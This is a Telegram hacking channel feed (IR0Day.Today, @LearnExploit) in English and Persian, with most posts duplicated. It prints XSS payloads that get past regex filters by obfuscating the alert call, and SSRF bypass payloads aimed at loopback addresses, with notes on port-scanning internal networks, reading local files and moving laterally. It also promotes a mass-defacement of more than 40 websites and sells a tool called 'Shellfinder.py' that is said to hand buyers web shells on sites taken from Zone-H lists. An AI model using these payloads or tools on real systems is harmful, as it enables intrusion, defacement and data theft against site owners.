Scripts Shop
GITHUB
Frontend > UiKit
Backend > Php
#web #shop
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
GITHUB
Frontend > UiKit
Backend > Php
#web #shop
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
👍2
-$ rmdir 2024/
-$ mkdir 2025/
-$ mkdir 2025/
❤🔥17🆒2
WebSockets.pdf
230.3 KB
مقاله کامل درباره وبسوکت
منبع: پورتسوییگر
زبان: فارسی
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
T.me/imexemi
👍2
Xss Payload for bypass the regex filter with Obfuscate the alert value :
پیلود XSS برای دور زدن Regex Filter با Obfuscate کردن مقدار Alert:
#bugbountyTips #xss
〰️〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
پیلود XSS برای دور زدن Regex Filter با Obfuscate کردن مقدار Alert:
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
#bugbountyTips #xss
〰️〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
👍2
SSRF Payloads To Bypass Firewall
Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):
http://127.127.127.127
http://127.0.0.0
http://127.1
http://0
http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3
http://127.1.1.1:80\@127.2.2.2:80/
http://[::1:80/
http://0000::1:80/
Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:
Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.
For example:
We discover that the following URL works:
We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network
#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):
1) Bypass SSRF with CIDR:http://127.127.127.127
http://127.0.0.0
2) Bypass using rare address:http://127.1
http://0
3) Bypass using tricks combination:http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3
4) Bypass against a weak parser:http://127.1.1.1:80\@127.2.2.2:80/
5) Bypass localhost with [:]:http://[::1:80/
http://0000::1:80/
Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:
Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.
For example:
We discover that the following URL works:
https://example.com: 8000/page?
user=&link=https://127.0.0.1:8000
We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network
#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
👍3💔3
How I hacked 100 hackers!
!رایتاپ چگونه 100 هکر را هک کردم
🔗link :
#Hack #writeUp #medium
#هک #رایتاپ
➖➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
!رایتاپ چگونه 100 هکر را هک کردم
🔗link :
https://medium.com/@corneacristian/how-i-hacked-100-hackers-5c3c313e8a1a
#Hack #writeUp #medium
#هک #رایتاپ
➖➖➖➖➖➖➖➖➖
♨️ IR0Day.Today Bax ♨️
⚠️ @LearnExploit
👍1
👍1
Media is too big
VIEW IN TELEGRAM
Massdef
More than 40 website in 1 user
#hack #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLarCyberLab
@Bvrce
More than 40 website in 1 user
#hack #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLarCyberLab
@Bvrce
❤🔥3
Media is too big
VIEW IN TELEGRAM
Shellfinder.py
قدرت این ابزارو توی ویدیو مشاهده میکنید
قیمت 460 هستش تخفیف خورده شده ۳۵۰ 😉❤️
ابزار به همین صورت ترو تمیز پرقدرت تحویل شما داده میشه گرب کنید از زون اچ بدید بهش بزارید براتون رندل کنه شل بده بهتون عشق کنید
برای تهیه پیام بدین :
@Bvrce
t.me/KurtLarCyberLab
قدرت این ابزارو توی ویدیو مشاهده میکنید
قیمت 460 هستش تخفیف خورده شده ۳۵۰ 😉❤️
ابزار به همین صورت ترو تمیز پرقدرت تحویل شما داده میشه گرب کنید از زون اچ بدید بهش بزارید براتون رندل کنه شل بده بهتون عشق کنید
برای تهیه پیام بدین :
@Bvrce
t.me/KurtLarCyberLab
👍3❤1